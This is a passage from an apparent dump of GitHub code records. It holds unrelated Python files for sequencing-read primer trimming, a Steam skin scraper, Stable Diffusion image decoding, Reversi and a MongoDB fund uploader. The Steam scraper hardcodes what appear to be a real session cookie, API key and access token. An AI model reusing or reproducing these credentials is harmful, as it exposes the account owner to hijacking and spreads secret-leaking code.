\"{name}\\t{vstats}\\t{jstats}\\t{avg_read_qual}\\n\"\n vstats = self.get_aln_stats(read, \"vgene\")\n jstats = self.get_aln_stats(read, \"jgene\")\n fh.write(\n stats.format(name=read[\"read_name\"],\n vstats=vstats,\n jstats=jstats,\n avg_read_qual=read[\"avgQual\"]\n )\n )\n\n def create_stats_handle(self, filename):\n \"\"\"\n Create a file handle for alignment stats\n\n Parameters\n ----------\n filename : Str\n The name of the stats file to be written\n\n Returns\n -------\n None\n \"\"\"\n header = \"name\\tv_gene\\tv_start\\tv_end\\tv_qStart\\tv_qEnd\\tv_score\\tv_cigar\\tv_mismatch\\tv_insertion\\tv_deletion\\tv_percent_id\\tv_alnType\\tv_primer_len\\tj_gene\\tj_start\\tj_end\\tj_qStart\\tj_qEnd\\tj_score\\tj_cigar\\tj_mismatch\\tj_insertion\\tj_deletion\\tj_percent_id\\tj_alnType\\tj_primer_len\\tavg_read_qual\\n\"\n if not filename in self.file_handles_:\n fh = open(filename, 'w')\n self.file_handles_[filename] = fh\n fh.write(header)\n fh = self.file_handles_[filename]\n return filename\n\n def trim_alignments(self, read, whichGene):\n \"\"\"\n get alignment information about a read\n\n Parameters\n ----------\n read : dict\n read record returned by FastqReader\n\n whichGene : Str\n which read \"read1\" or \"read2\"\n\n Returns\n -------\n classify : Str\n alignment classification string containing alignment information\n \"\"\"\n \n classify = \"\"\n seq = read[\"seq\"] \n start = read[whichGene][\"query_start\"]\n end = read[whichGene][\"query_end\"] \n mismatch = read[whichGene][\"mismatches\"]\n insertion = read[whichGene][\"insertions\"]\n deletion = read[whichGene][\"deletions\"] \n strand = read[whichGene][\"strand\"]\n refLen = len(self.reference[read[whichGene][\"reference_name\"]][\"seq\"])\n clipped = refLen - (end - start + 1)\n indels = insertion + deletion\n totDiff = indels + mismatch + clipped\n trimSeq = 
read[\"trim_seq\"]\n trimQual = read[\"trim_qual\"] \n ## check V primer alignment\n if whichGene == \"vgene\":\n if mismatch <= 2 and indels <=1 and clipped <=1 and totDiff <=3: \n trimSeq = trimSeq[end:]\n trimQual = trimQual[end:]\n classify = \"good_quality\"\n else:\n classify = \"low_quality\"\n ## check J primer alignment\n if whichGene == \"jgene\":\n if mismatch <= 2 and indels <=1 and clipped <=1 and totDiff <=3: \n classify = \"good_quality\"\n toTrim = (len(seq) - start) + 1 - 5 ## +1 for zero-based, and - 5 to leave CDR3 boundary\n trimSeq = trimSeq[:-toTrim]\n trimQual = trimQual[:-toTrim]\n else:\n classify = \"low_quality\"\n read[whichGene][\"classification\"] = classify \n read[\"trim_seq\"] = trimSeq\n read[\"trim_qual\"] = trimQual \n return read\n\n def trim_primers(self, vbam, jbam, basename):\n \"\"\"\n Identify primer alignments, trim alignments from reads\n \n Parameters\n ----------\n Vbam : string\n Read alignments against V gene primers\n Jbam : string\n Read alignments against J gene primers\n basename : string\n basename for report files\n\n Returns\n -------\n None\n \"\"\"\n #######################\n ## create file handles\n #######################\n trim_reads = self.create_fastq_handle(\"{}_trim_primers.fastq\".format(basename))\n too_short = self.create_fastq_handle(\"{}_too_short.fastq\".format(basename))\n primer_hits = self.create_stats_handle(\"{}_trim_primers.tsv\".format(basename))\n short_hits = self.create_stats_handle(\"{}_too_short.tsv\".format(basename))\n #############################\n # filter reads by alignment\n ############################# \n for read in read_two_bams(vbam, \"vgene\", jbam, \"jgene\"): \n read[\"trim_seq\"] = read[\"seq\"]\n read[\"trim_qual\"] = read[\"qual\"] \n # both V and J align\n if read[\"vgene\"] is not None and read[\"jgene\"] is not None:\n read = self.trim_alignments(read, \"vgene\")\n read = self.trim_alignments(read, \"jgene\") \n elif read[\"vgene\"] is not None and read[\"jgene\"] is None:\n read = self.trim_alignments(read, \"vgene\")\n elif read[\"vgene\"] is None and read[\"jgene\"] is not None:\n read = self.trim_alignments(read, \"jgene\")\n if len(read[\"trim_seq\"]) > 50:\n read[\"seq\"] = read[\"trim_seq\"]\n read[\"qual\"] = read[\"trim_qual\"]\n self.write_fastq(read, trim_reads)\n self.write_aln_stats(read, primer_hits)\n else:\n self.write_fastq(read, too_short)\n self.write_aln_stats(read, short_hits)\n self.close_file_handles()\n \n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"gather amplicon stats from bam file\")\n parser.add_argument(\"-p\", \"--primer_info\",\n required=True,\n help=\"primer information file\")\n parser.add_argument(\"-b\", \"--basename\",\n required=True,\n help=\"basename for output files\")\n parser.add_argument(\"-v\", \"--v_aln\",\n required=True,\n help=\"V probe alignment bam file\")\n parser.add_argument(\"-j\", \"--j_aln\",\n required=True,\n help=\"J probe alignment bam file\")\n args = parser.parse_args()\n trimmer = IPetePrimerTrimmer(args.primer_info, 14)\n trimmer.trim_primers(args.v_aln, args.j_aln, args.basename)\n\nif __name__ == '__main__': \n main()\n\n\n","repo_name":"bioinform/Daedalus","sub_path":"packages/trim-primers/trimPrimers/trimPrimers.py","file_name":"trimPrimers.py","file_ext":"py","file_size_in_byte":9403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12882327358","text":"import json\nimport requests # make http requests\n\nfrom bank.models import 
create_tables, insert_asset\n\ncookie = {'steamLoginSecure': '76561198070606333%7C%7CeyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0.eyAiaXNzIjogInI6MENFRV8yMjEzMUEzMF81MkI5RCIsICJzdWIiOiAiNzY1NjExOTgwNzA2MDYzMzMiLCAiYXVkIjogWyAid2ViIiBdLCAiZXhwIjogMTY4NTcyMjA2OCwgIm5iZiI6IDE2NzY5OTUzMTIsICJpYXQiOiAxNjg1NjM1MzEyLCAianRpIjogIjBEMzBfMjJBMDFFM0VfRjY2RUYiLCAib2F0IjogMTY3NjQxMzA2OSwgInJ0X2V4cCI6IDE2OTQ1OTI5MTcsICJwZXIiOiAwLCAiaXBfc3ViamVjdCI6ICIxODUuMTIxLjE3NC4xMzMiLCAiaXBfY29uZmlybWVyIjogIjE4NS4xMjEuMTc0LjEzMyIgfQ.rkTS3CYuYRakaZL7YQVm_LbP-3EP7PykOtj1JGi0B9nu8teiOAX4l0hQLs3GbU_QABxTC4jxO3ZWzIm2nOmkBQ'}\nicon_path = 'https://community.cloudflare.steamstatic.com/economy/image/'\nwebAPIKey = 'C34AF91C568BBF6D3D031292210741A3'\ntoken = 'ce4090bc6a3c4acbaf7f6d05b5eb5888'\nsteamID = '76561198070606333'\ngameID = '730'\ncount = '100'\n\n\ndef init_database():\n\t# find total number items\n\tallItemsGet = requests.get('https://steamcommunity.com/market/search/render/?search_descriptions=0&sort_column=default&sort_dir=desc&appid='+gameID+'&norender=1&count='+count, cookies=cookie) # get page\n\tallItems = allItemsGet.content; # get page content\n\tallItems = json.loads(allItems); # convert to JSON\n\t\t\n\n\tcreate_tables()\n\n\tfor result in allItems['results']:\n\t\tclassid = result['asset_description']['classid']\n\t\tinstanceid = result['asset_description']['instanceid']\n\t\ticon_url = icon_path + result['asset_description']['icon_url']\n\t\tsell_price = result['sell_price']\n\t\t\n\t\titemGet = requests.get('https://api.steampowered.com/ISteamEconomy/GetAssetClassInfo/v1/?access_token='+token+'&appid='+gameID+'&class_count=1&classid0='+classid+'&instanceid0='+instanceid)\n\t\titem = itemGet.content; # get page content\n\t\titem = json.loads(item)\n\t\t\n\t\tif(instanceid == '0'):\n\t\t\titemid = classid\n\t\telse:\n\t\t\titemid = classid + '_' + instanceid\n\t\t\n\t\tname = item['result'][itemid]['name']\t\n\t\tquality = item['result'][itemid]['descriptions']['0']['value'][10:]\n\t\t\n\t\tinsert_asset((classid), int(instanceid), name, sell_price, quality, icon_url)\n\n","repo_name":"JakeGreen85/CSGOSkins","sub_path":"CSGOSkins-master/bank/scrape_skins.py","file_name":"scrape_skins.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3255444128","text":"import h5py\nfrom PIL import Image\nimport scipy.io\nimport argparse, os\nimport pandas as pd\nimport PIL\nimport torch\nimport numpy as np\nfrom omegaconf import OmegaConf\nfrom tqdm import trange\nfrom einops import rearrange\nfrom torch import autocast\nfrom contextlib import nullcontext\nfrom pytorch_lightning import seed_everything\nimport sys\nsys.path.append(\"../utils/\")\nfrom nsd_access.nsda import NSDAccess\nfrom ldm.util import instantiate_from_config\nfrom ldm.models.diffusion.ddim import DDIMSampler\n\ndef load_model_from_config(config, ckpt, gpu, verbose=False):\n print(f\"Loading model from {ckpt}\")\n pl_sd = torch.load(ckpt, map_location=\"cpu\")\n if \"global_step\" in pl_sd:\n print(f\"Global Step: {pl_sd['global_step']}\")\n sd = pl_sd[\"state_dict\"]\n model = instantiate_from_config(config.model)\n m, u = model.load_state_dict(sd, strict=False)\n if len(m) > 0 and verbose:\n print(\"missing keys:\")\n print(m)\n if len(u) > 0 and verbose:\n print(\"unexpected keys:\")\n print(u)\n model.cuda(f\"cuda:{gpu}\")\n model.eval()\n return model\n\ndef load_img_from_arr(img_arr):\n image = Image.fromarray(img_arr).convert(\"RGB\")\n w, h 
= 512, 512\n    image = image.resize((w, h), resample=PIL.Image.LANCZOS)\n    image = np.array(image).astype(np.float32) / 255.0\n    image = image[None].transpose(0, 3, 1, 2)\n    image = torch.from_numpy(image)\n    return 2.*image - 1.\n\ndef main():\n\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument(\n        \"--imgidx\",\n        required=True,\n        type=int,\n        help=\"img idx\"\n    )\n    parser.add_argument(\n        \"--gpu\",\n        required=True,\n        type=int,\n        help=\"gpu\"\n    )\n    parser.add_argument(\n        \"--seed\",\n        type=int,\n        default=42,\n        help=\"the seed (for reproducible sampling)\",\n    )\n    parser.add_argument(\n        \"--subject\",\n        required=True,\n        type=str,\n        default=None,\n        help=\"subject name: subj01 or subj02 or subj05 or subj07 for full-data subjects \",\n    )\n    parser.add_argument(\n        \"--method\",\n        required=True,\n        type=str,\n        help=\"cvpr or text or gan\",\n    )\n\n    # Set parameters\n    opt = parser.parse_args()\n    seed_everything(opt.seed)\n    imgidx = opt.imgidx\n    gpu = opt.gpu\n    method = opt.method\n    subject=opt.subject\n    gandir = f'../../decoded/gan_recon_img/all_layers/{subject}/streams/'\n    captdir = f'../../decoded/{subject}/captions/'\n\n    # Load NSD information\n    nsd_expdesign = scipy.io.loadmat('../../nsd/nsddata/experiments/nsd/nsd_expdesign.mat')\n\n    # Note that most of them are 1-based indices!\n    # This is why I subtract 1\n    sharedix = nsd_expdesign['sharedix'] -1 \n\n    nsda = NSDAccess('../../nsd/')\n    sf = h5py.File(nsda.stimuli_file, 'r')\n    sdataset = sf.get('imgBrick')\n\n    stims_ave = np.load(f'../../mrifeat/{subject}/{subject}_stims_ave.npy')\n\n\n    tr_idx = np.zeros_like(stims_ave)\n    for idx, s in enumerate(stims_ave):\n        if s in sharedix:\n            tr_idx[idx] = 0\n        else:\n            tr_idx[idx] = 1\n\n    # Load Stable Diffusion Model\n    config = './stable-diffusion/configs/stable-diffusion/v1-inference.yaml'\n    ckpt = './stable-diffusion/models/ldm/stable-diffusion-v1/sd-v1-4.ckpt'\n    config = OmegaConf.load(f\"{config}\")\n    torch.cuda.set_device(gpu)\n    model = load_model_from_config(config, f\"{ckpt}\", gpu)\n\n    n_samples = 1\n    ddim_steps = 50\n    ddim_eta = 0.0\n    strength = 0.8\n    scale = 5.0\n    n_iter = 5\n    precision = 'autocast'\n    precision_scope = autocast if precision == \"autocast\" else nullcontext\n    batch_size = n_samples\n    device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\n    outdir = f'../../decoded/image-{method}/{subject}/'\n    os.makedirs(outdir, exist_ok=True)\n\n    sample_path = os.path.join(outdir, f\"samples\")\n    os.makedirs(sample_path, exist_ok=True)\n    precision = 'autocast'\n    device = torch.device(f\"cuda:{gpu}\") if torch.cuda.is_available() else torch.device(\"cpu\")\n    model = model.to(device)\n    sampler = DDIMSampler(model)\n\n    sampler.make_schedule(ddim_num_steps=ddim_steps, ddim_eta=ddim_eta, verbose=False)\n\n    assert 0. 
<= strength <= 1., 'can only work with strength in [0.0, 1.0]'\n t_enc = int(strength * ddim_steps)\n print(f\"target t_enc is {t_enc} steps\")\n\n # Load z (Image)\n imgidx_te = np.where(tr_idx==0)[0][imgidx] # Extract test image index\n idx73k= stims_ave[imgidx_te]\n Image.fromarray(np.squeeze(sdataset[idx73k,:,:,:]).astype(np.uint8)).save(\n os.path.join(sample_path, f\"{imgidx:05}_org.png\")) \n \n if method in ['cvpr','text']:\n roi_latent = 'early'\n scores_latent = np.load(f'../../decoded/{subject}/{subject}_{roi_latent}_scores_init_latent.npy')\n imgarr = torch.Tensor(scores_latent[imgidx,:].reshape(4,40,40)).unsqueeze(0).to('cuda')\n\n # Generate image from Z\n precision_scope = autocast if precision == \"autocast\" else nullcontext\n with torch.no_grad():\n with precision_scope(\"cuda\"):\n with model.ema_scope():\n x_samples = model.decode_first_stage(imgarr)\n x_samples = torch.clamp((x_samples + 1.0) / 2.0, min=0.0, max=1.0)\n\n for x_sample in x_samples:\n x_sample = 255. * rearrange(x_sample.cpu().numpy(), 'c h w -> h w c')\n im = Image.fromarray(x_sample.astype(np.uint8)).resize((512,512))\n im = np.array(im)\n\n elif method == 'gan':\n ganpath = f'{gandir}/recon_image_normalized-VGG19-fc8-{subject}-streams-{imgidx:06}.tiff'\n im = Image.open(ganpath).resize((512,512))\n im = np.array(im)\n\n init_image = load_img_from_arr(im).to('cuda')\n init_latent = model.get_first_stage_encoding(model.encode_first_stage(init_image)) # move to latent space\n\n # Load c (Semantics)\n if method == 'cvpr':\n roi_c = 'ventral'\n scores_c = np.load(f'../../decoded/{subject}/{subject}_{roi_c}_scores_c.npy')\n carr = scores_c[imgidx,:].reshape(77,768)\n c = torch.Tensor(carr).unsqueeze(0).to('cuda')\n elif method in ['text','gan']:\n captions = pd.read_csv(f'{captdir}/captions_brain.csv', sep='\\t',header=None)\n c = model.get_learned_conditioning(captions.iloc[imgidx][0]).to('cuda')\n\n # Generate image from Z (image) + C (semantics)\n base_count = 0\n with torch.no_grad():\n with precision_scope(\"cuda\"):\n with model.ema_scope():\n for n in trange(n_iter, desc=\"Sampling\"):\n uc = model.get_learned_conditioning(batch_size * [\"\"])\n\n # encode (scaled latent)\n z_enc = sampler.stochastic_encode(init_latent, torch.tensor([t_enc]*batch_size).to(device))\n # decode it\n samples = sampler.decode(z_enc, c, t_enc, unconditional_guidance_scale=scale,\n unconditional_conditioning=uc,)\n\n x_samples = model.decode_first_stage(samples)\n x_samples = torch.clamp((x_samples + 1.0) / 2.0, min=0.0, max=1.0)\n\n for x_sample in x_samples:\n x_sample = 255. 
* rearrange(x_sample.cpu().numpy(), 'c h w -> h w c')\n                        Image.fromarray(x_sample.astype(np.uint8)).save(\n                            os.path.join(sample_path, f\"{imgidx:05}_{base_count:03}.png\")) \n                        base_count += 1\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"yu-takagi/StableDiffusionReconstruction","sub_path":"codes/diffusion_sd1/diffusion_decoding.py","file_name":"diffusion_decoding.py","file_ext":"py","file_size_in_byte":7540,"program_lang":"python","lang":"en","doc_type":"code","stars":1018,"dataset":"github-code","pt":"34"} +{"seq_id":"41353663873","text":"import random\nimport globalvar as gv\n\n# initialize the board to starting position\ndef initializeBoard(board):\n    board[3][3], board[3][4] = gv.P2, gv.P1\n    board[4][3], board[4][4] = gv.P1, gv.P2\n    return board\n\n# shows the board, used for debugging purposes\ndef showBoard(board):\n    for x in range(8):\n        for y in range(8):\n            print(board[x][y], end=' ')\n        print('')\n\n# checks that the given coordinates are within the bounds of the board\ndef isOnBoard(x, y):\n    return (0<=x<=7) and (0<=y<=7)\n\n# get the number of empty tiles left on a board\ndef getEmptyTiles(board):\n    empty = 0\n\n    for x in range(8):\n        for y in range(8):\n            if board[x][y] == '.':\n                empty += 1\n\n    return empty\n\n# returns the opponent's pieces that can be flipped when a player places their piece at the selected position\ndef getDisksToFlip(board, turn, x_pos, y_pos):\n    if board[x_pos][y_pos] != '.' or not isOnBoard(x_pos, y_pos):\n        return []\n\n    if (turn == gv.P1):\n        enemy = gv.P2\n    elif (turn == gv.P2):\n        enemy = gv.P1\n\n    validDisks = []\n\n    for x_move, y_move in [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 1], [1, -1], [1, 0], [1, 1]]:\n        x_cur, y_cur = x_pos, y_pos\n        x_cur += x_move\n        y_cur += y_move\n\n        # check if the current tile is the enemy's and within the board\n        if isOnBoard(x_cur, y_cur) and board[x_cur][y_cur] == enemy:\n            x_cur += x_move\n            y_cur += y_move\n\n            # move on to the next direction if the coordinate leaves the board\n            if not isOnBoard(x_cur, y_cur):\n                continue\n\n            # keep walking in this direction while the tiles still belong to the enemy\n            while board[x_cur][y_cur] == enemy:\n                x_cur += x_move\n                y_cur += y_move\n\n                if not isOnBoard(x_cur, y_cur):\n                    break\n\n            if not isOnBoard(x_cur, y_cur):\n                continue\n\n            if board[x_cur][y_cur] == turn:\n                while True:\n                    x_cur -= x_move\n                    y_cur -= y_move\n\n                    if x_cur == x_pos and y_cur == y_pos:\n                        break\n\n                    validDisks.append([x_cur, y_cur])\n\n    return validDisks\n\n# get the valid moves on a board, as coordinates\ndef getValidMoves(board, turn):\n    validMoves = []\n\n    for x in range(8):\n        for y in range(8):\n            if getDisksToFlip(board, turn, x, y) != []:\n                validMoves.append([x, y])\n\n    return validMoves\n\n# modify the board after a disk is placed on it\ndef makeMove(board, turn, x_pos, y_pos):\n    tilesToFlip = getDisksToFlip(board, turn, x_pos, y_pos)\n\n    if len(tilesToFlip) != 0:\n        board[x_pos][y_pos] = turn\n        for x_cur, y_cur in tilesToFlip:\n            board[x_cur][y_cur] = turn\n\n    return board\n\n# get the piece counts for both players on a board\ndef getScore(board):\n    b_score, w_score = 0, 0\n\n    for x in range(8):\n        for y in range(8):\n            if board[x][y] == gv.P1:\n                b_score += 1\n            elif board[x][y] == gv.P2:\n                w_score += 1\n\n    return b_score, w_score\n","repo_name":"ryananggada/PyReversi","sub_path":"reversifunc.py","file_name":"reversifunc.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26067894977","text":"import datetime\nimport os\nimport 
xml.etree.ElementTree as ET\n\nfrom dotenv import load_dotenv\nfrom pymongo import MongoClient\n\nload_dotenv()\n\nDATA_DIR = \"data\"\nCONNECTION_STRING = f\"mongodb+srv://gugge:{os.getenv('mongo_pass')}@cluster0.fxfss.mongodb.net/fundwise?retryWrites=true&w=majority\"\nCOLLECTION = \"funds\"\nDATABASE = \"myFirstDatabase\"\n\nfund_name = \"fundName\"\nholdings_date = \"holdingsDate\"\nfund_company_name = \"fundCompanyName\"\nfund_holdings = \"fundHoldings\"\ncompany_name = \"companyName\"\nshare_of_fund = \"shareOfFund\"\n\n\ndef get_period(root: ET.Element, ns: dict) -> datetime.datetime:\n report_info = root.findall(\"fund:Rapportinformation\", ns)[0]\n return datetime.datetime.strptime(\n report_info.find(\"fund:Kvartalsslut\", ns).text, \"%Y-%m-%d\"\n )\n\n\ndef get_fund_company_name(root: ET.Element, ns: dict):\n report_info = root.findall(\"fund:Bolagsinformation\", ns)[0]\n return report_info.find(\"fund:Fondbolag_namn\", ns).text\n\n\ndef get_fund_name(root: ET.Element, ns: dict):\n report_info = root.findall(\"fund:Fondinformation\", ns)[0]\n return report_info.find(\"fund:Fond_namn\", ns).text\n\n\ndef get_holdings(root: ET.Element, ns: dict):\n fund_info = root.findall(\"fund:Fondinformation\", ns)[0]\n for child in fund_info:\n if \"FinansiellaInstrument\" in child.tag:\n break\n holdings = []\n for financial_instrument in child:\n holdings.append(\n {\n company_name: financial_instrument.find(\"fund:Instrumentnamn\", ns).text,\n share_of_fund: financial_instrument.find(\n \"fund:Andel_av_fondförmögenhet_instrument\", ns\n ).text,\n }\n )\n return holdings\n\n\ndef get_files() -> list[str]:\n files = []\n for quarter_dir in os.listdir(DATA_DIR):\n quarter_fund_data = os.path.join(DATA_DIR, quarter_dir)\n if not os.path.isdir(quarter_fund_data):\n continue\n for quarter in os.listdir(quarter_fund_data):\n fund_quarter_data = os.path.join(quarter_fund_data, quarter)\n if not os.path.isdir(fund_quarter_data):\n continue\n for fund in os.listdir(fund_quarter_data):\n if not \".xml\" in fund:\n continue\n files.append(os.path.join(fund_quarter_data, fund))\n return files\n\n\ndef get_root(filepath):\n tree = ET.parse(filepath)\n root = tree.getroot()\n ns = {\"fund\": root.tag.split(\"}\")[0].replace(\"{\", \"\")}\n return root, ns\n\n\ndef insert_data(root, ns):\n date = get_period(root, ns)\n company_name = get_fund_company_name(root, ns)\n name = get_fund_name(root, ns)\n holdings = get_holdings(root, ns)\n\n fund_data_record = {\n \"$set\": {\n fund_name: name,\n holdings_date: date,\n fund_company_name: company_name,\n fund_holdings: holdings,\n }\n }\n\n client = MongoClient(CONNECTION_STRING)\n db = client[DATABASE]\n collection = db[COLLECTION]\n collection.update_one({fund_name: name, holdings_date: date}, fund_data_record, upsert=True)\n\n\nif __name__ == \"__main__\":\n files = get_files()\n for file in files:\n print(file)\n root, ns = get_root(file)\n insert_data(root, ns)\n","repo_name":"johaneg/fundwise-upload","sub_path":"fundwise_upload/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17188296356","text":"from django import forms\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, ButtonHolder, Submit, Field, Div ,Row\nfrom app.models import Sample\nimport string\nimport random\nimport os\nfrom gentelella.settings import BASE_DIR, DATA_FOLDER, MEDIA_ROOT\nfrom django.db.models import 
Q\nfrom django.core.mail import send_mail\n\n\ndef generate_uniq_id(size=20, chars=string.ascii_uppercase + string.digits):\n    return ''.join(random.choice(chars) for _ in range(size))\n\nclass ContactForm(forms.Form):\n\n    email_input=forms.EmailField(label=\"Please enter your email in case we should contact you (not required)\", required=False)\n    name_input=forms.CharField(label=\"Please enter your name (not required)\",widget=forms.TextInput(attrs={'placeholder': 'Your Name'}),required=False)\n    info=forms.CharField(label=\"Sample/Project info\",widget=forms.Textarea(attrs={'placeholder': 'Please include SRP/SRA ids and any extra info you deem useful for the DB'}))\n    #field2= forms.CharField(label=')', required=False)\n\n    ##choices go here\n    def __init__(self, *args, **kwargs):\n        super(ContactForm, self).__init__(*args, **kwargs)\n        self.helper = FormHelper()\n        self.helper.layout = Layout(\n            Fieldset(\n                \"Is there some study/samples you would like to see included?\",\n                Field('email_input',css_class='form-control'),\n                Field('name_input',css_class='form-control'),\n                Field('info', css_class='form-control'),\n                ButtonHolder(\n                    # Submit('submit', 'RUN', css_class='btn btn-primary', onclick=\"alert('Neat!'); return true\")\n                    Submit('submit', 'SEND', css_class='btn btn-primary btn-form')\n                    # onsubmit=\"alert('Neat!'); return false\")\n                ))\n\n        )\n\n    def send_email(self):\n        cleaned_data = self.cleaned_data\n        send_mail('liqDB: New Data from '+ cleaned_data.get(\"name_input\"), cleaned_data.get(\"info\")+\"\\nCONTACT EMAIL: \"+cleaned_data.get(\"email_input\"), 'liquiddbase@gmail.com',\n                  ['eaparicioeaparicio@gmail.com'], fail_silently=False)\n\n    def generate_id(self):\n        is_new = True\n        while is_new:\n            query_id = generate_uniq_id()\n            #query_path =os.path.join(MEDIA_ROOT,query_id)\n            query_path =os.path.join(DATA_FOLDER,\"queryData\",query_id)\n            if not os.path.exists(query_path):\n                os.mkdir(query_path)\n                return query_id\n\n","repo_name":"sert23/liqDB","sub_path":"gentelella/app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5132079593","text":"from django.contrib import admin\nfrom django.conf.urls import url\nfrom django.urls import path, include\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions\n\n\nschema_view = get_schema_view(\n    openapi.Info(\n        title=\"NEK API\",\n        default_version='v1',\n        description=\"Documentation for the NEK application of the NEK_test project\",\n        contact=openapi.Contact(email=\"example@example.com\"),\n        license=openapi.License(name=\"BSD License\"),\n    ),\n    public=True,\n    permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('api/', include('api.urls')),\n]\n\nurlpatterns += [\n    url(r'^redoc/$', schema_view.with_ui('redoc', cache_timeout=0),\n        name='schema-redoc'),\n]\n","repo_name":"AlexandrSharganov/nek_test","sub_path":"nek/nek/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19480380881","text":"from random import Random\nclass rtl:\n    def random_str(self,randomlength=8):\n        str = ''\n        chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz'\n        length = len(chars) - 1\n        random = Random()\n        for i in range(randomlength):\n            str+=chars[random.randint(0, length)]\n        return 
str","repo_name":"Mesus/Uvis","sub_path":"gim/common/randomTools.py","file_name":"randomTools.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1328099525","text":"# encoding=utf8\n\n\"\"\" The spec definitions\n Author: lipixun\n Created Time : 四 5/26 23:42:26 2016\n\n File Name: spec.py\n Description:\n\n\"\"\"\n\n# -*- ---------- The feature specs ---------- -*-\n\n# The store feature\nFEATURE_STORE_EXIST = 'store.exist' # Check if exist by id\nFEATURE_STORE_GET = 'store.get' # Get value by id / ids\nFEATURE_STORE_CREATE = 'store.create' # Create new value\nFEATURE_STORE_REPLACE = 'store.replace' # Replace value by model\nFEATURE_STORE_UPDATE = 'store.update' # Update value by id\nFEATURE_STORE_DELETE = 'store.delete' # Delete value by id\nFEATURE_STORE_COUNT = 'store.count' # Count the value\n\n# The query feature\nFEATURE_QUERY_EXIST = 'query.exist' # Check exists by query\nFEATURE_QUERY_GET = 'query.get' # Get values by query\nFEATURE_QUERY_UPDATE = 'query.update' # Update values by query\nFEATURE_QUERY_DELETE = 'query.delete' # Delete values by query\nFEATURE_QUERY_COUNT = 'query.count' # Count values by query\n\n# The high level feature\nFEATURE_WATCH = 'watch' # The watch feature\n\n# -*- ---------- The data manager event specs ---------- -*-\n\nEVENT_CREATED = 'created' # Created\nEVENT_REPLACED = 'replaced' # Replaced\nEVENT_UPDATED = 'updated' # Updated\nEVENT_DELETED = 'deleted' # Deleted\n\n# -*- ---------- The error definition ---------- -*-\n\nERROR_DUPLICATED_KEY = 0x40000001 # Duplicated key found\n","repo_name":"gavin0723/pydatahub","sub_path":"datahub/spec.py","file_name":"spec.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11910153200","text":"import disnake\nfrom disnake.ext import commands\n\nimport time\n\nfrom config import LINK\n\n\nclass ManagementCommands(commands.Cog):\n \"\"\"Handling interactions to ping or invite the bot and get server information.\"\"\"\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.slash_command()\n async def ping(self, inter: disnake.ApplicationCommandInteraction):\n \"\"\"See if The Bot is Working\"\"\"\n ping = time.time()\n await inter.send(\"Pinging...\")\n pingtime = time.time() - ping\n await inter.edit_original_message(\n content=\":ping_pong: time is `%.01f seconds`\" % pingtime)\n\n @commands.slash_command()\n async def botinvite(self,\n inter: disnake.ApplicationCommandInteraction,\n recipient: disnake.Member = None):\n \"\"\"A Link To Invite This Bot To Your Server!\"\"\"\n await inter.send(\"Check Your Dm's :wink:\")\n message = f\"Add me to Your Server: {LINK}\"\n if recipient:\n await recipient.send(message)\n else:\n await inter.author.send(message)\n\n @commands.slash_command()\n async def serverinfo(self, inter: disnake.ApplicationCommandInteraction):\n \"\"\"Displays Info About The Server!\"\"\"\n\n guild = inter.guild\n roles = [x.name for x in guild.roles]\n role_length = len(roles)\n\n # Just in case there are too many roles...\n if role_length > 50:\n roles = roles[:50]\n roles.append('>>>> Displaying[50/%s] Roles' % len(roles))\n\n roles = ', '.join(roles)\n channels = len(guild.channels)\n time = str(guild.created_at)\n time = time.split(' ')\n time = time[0]\n\n join = disnake.Embed(description='%s ' % (str(guild)),\n title='Server Info',\n colour=0xFFFF)\n # 
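disabled upstream; with current disnake, guild.icon is an Asset, so re-enabling this would likely need url=guild.icon.url rather than file=. Original call: 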
join.set_thumbnail(file = guild.icon)\n join.add_field(name='__Owner__',\n value=str(guild.owner) + '\\n' + str(guild.owner_id))\n join.add_field(name='__ID__', value=str(guild.id))\n join.add_field(name='__Member Count__', value=str(guild.member_count))\n join.add_field(name='__Text/Voice Channels__', value=str(channels))\n join.add_field(name='__Roles (%s)__' % str(role_length), value=roles)\n join.set_footer(text='Created: %s' % time)\n\n await inter.send(embed=join)\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(ManagementCommands(bot))\n","repo_name":"D-Bald/BirthdayGratulationBot","sub_path":"cogs/bot_management_commands.py","file_name":"bot_management_commands.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26557246241","text":"NETWORK = 'network'\nSUBNET = 'subnet'\nPORT = 'port'\nSECURITY_GROUP = 'security_group'\n\nCREATE = 'create'\nDELETE = 'delete'\nUPDATE = 'update'\n\nAGENT = 'q-agent-notifier'\nPLUGIN = 'q-plugin'\nDHCP = 